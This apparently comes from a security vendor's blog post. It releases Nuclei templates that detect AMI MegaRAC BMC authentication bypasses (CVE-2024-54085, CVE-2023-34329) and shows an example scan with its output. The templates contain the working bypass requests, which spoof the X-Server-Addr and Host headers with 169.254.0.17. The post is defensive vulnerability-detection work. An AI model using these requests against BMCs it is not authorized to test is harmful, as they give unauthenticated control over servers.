An attacker armed with the latest knowledge of BMC vulnerabilities and exploits is poised to take control of your server(s). Given that one of these vulnerabilities, CVE-2024-54085, was recently added to the CISA KEV, we now know exploitation is happening in the wild. Organizations must inventory IT assets and then determine if a given vulnerability is present. Due to the high severity (CVSS 10.0) and active exploitation of CVE-2024-54085, we are releasing Nuclei templates to help with vulnerability discovery.
Using the open-source tool Nuclei (from Project Discovery), you can utilize the provided templates below to test your AMI MegaRAC systems for both CVE-2024-54085 and CVE-2023-34329 (a similar vulnerability we previously disclosed).
Both templates test for the vulnerability by sending a series of HTTP POST requests. Keep in mind that OEMs have implemented AMI MegaRAC in various BMC systems, so be sure to test all of your IT infrastructure assets, especially the network segments containing the BMCs (because you are segmenting them and not exposing them to the Internet, we hope!). Different OEMs’ implementations can make it challenging to detect vulnerabilities based on version numbers, as each vendor may implement its version number, making this type of testing unreliable. The Nuclei templates below will more accurately test BMCs for these vulnerabilities, regardless of the OEM customizations for versioning.
CVE-2024-54085 – AMI MegaRAC Authentication Bypass
id: CVE-2024-54085
info:
name: BMC&C v3 - Authentication Bypass
author: Vlad Babkin
severity: critical
description: |
AMI MegaRAC authentication bypass
reference:
- https://eclypsium.com/blog/ami-megarac-vulnerabilities-bmc-part-3/
- https://nvd.nist.gov/vuln/detail/CVE-2024-54085
metadata:
verified: true
max-requests: 3
tags: cve,cve2024,ami,megarac,kev
http:
- raw:
- |
GET /redfish/v1 HTTP/1.1
Host: {{Hostname}}
- |
GET /redfish/v1/Systems HTTP/1.1
Host: {{Hostname}}
- |
GET /redfish/v1/Systems HTTP/1.1
Host: {{Hostname}}
X-Server-Addr: 169.254.0.17:
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && status_code_2 != 200 && status_code_3 == 200 && (contains(body_1, "\"Vendor\":\"AMI\"") || contains(all_headers_1, "AMI MegaRAC Redfish Service"))'
condition: and
CVE-2023-34329 – AMI MegaRAC Authentication Bypass
The Nuclei template below will check for the previously disclosed authentication bypass. Note the significant difference between this check and the one above is the headers used in the final POST request:
id: CVE-2023-34329
info:
name: BMC&C v2 - Authentication Bypass
author: Vlad Babkin
severity: critical
description: |
AMI MegaRAC authentication bypass
reference:
- https://eclypsium.com/research/bmcc-lights-out-forever/
- https://nvd.nist.gov/vuln/detail/CVE-2023-34329
metadata:
verified: true
max-requests: 3
tags: cve,cve2024,ami,megarac,kev
http:
- raw:
- |
GET /redfish/v1 HTTP/1.1
Host: {{Hostname}}
- |
GET /redfish/v1/Systems HTTP/1.1
Host: {{Hostname}}
- |
GET /redfish/v1/Systems HTTP/1.1
Host: 169.254.0.17
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && status_code_2 != 200 && status_code_3 == 200 && (contains(body_1, "\"Vendor\":\"AMI\"") || contains(all_headers_1, "AMI MegaRAC Redfish Service"))'
condition: and
Scanning Systems
You can save the above Nuclei templates to a file (e.g., CVE-2024-54085.yaml) and run Nuclei as follows to scan a target:
$ nuclei -u https://[TARGET] -t CVE-2024-54085.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.7
projectdiscovery.io
[INF] Current nuclei version: v3.4.7 (latest)
[INF] Current nuclei-templates version: v10.2.4 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 67
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2024-54085] [http] [critical] https://[TARGET]/redfish/v1/Systems
[INF] Scan completed in 7.950308209s. 1 matches found.
Nuclei can also scan a target list from a file using the -l flag and output the results to a JSON file using the -je flag.
Note: For existing Eclypsium customers, this functionality is included in the product.
Resources
- 2022: BMC&C Part 1 – Multiple AMI MegaRAC vulnerabilities including arbitrary code execution via Redfish API and default credentials for root shell access
- 2023: BMC&C Part 2 – Authentication bypass via HTTP header spoofing and code injection through the Dynamic Redfish Extension interface
- 2025: BMC&C Part 3 – CVE-2024-54085, the remotely exploitable authentication bypass that finally made it onto CISA’s most critical list
- A Historic First: BMC Vulnerability CVE-2024-54085 Joins CISA’s Most Critical List
